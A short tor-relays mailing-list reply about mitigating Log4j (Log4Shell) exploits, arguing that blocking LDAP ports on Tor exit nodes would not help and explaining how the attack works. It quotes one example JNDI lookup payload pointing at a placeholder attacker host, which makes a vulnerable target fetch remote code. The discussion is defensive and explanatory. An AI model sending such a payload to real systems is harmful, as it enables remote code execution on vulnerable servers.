[tor-relays] Mitigating log4j exploits
Felix Eckhofer
felix at tribut.de
Sat Dec 11 16:33:55 UTC 2021
Hey,
On 11.12.2021 13:51, Jens Kubieziel wrote:
> attacks. One possibility is, in my opinion, rejecting connection over
> ports 389 and 636. What do you think? Should we as exit node operators
> block connections over those LDAP ports for some amount of time?
I don't think this is going to help.
The exploit works like this: Send a special string that *references* an
ldap server (most used right now, though other protocols are possible),
such as "${jndi:ldap://attacker.example.com:port/a}". The target then
contacts the ldap server and essentially downloads the malicious code
from there. You can include a custom port as shown and many attackers
do. Most exploit attempts use http(s). Nothing we can block without
packet inspection.
Best regards,
Felix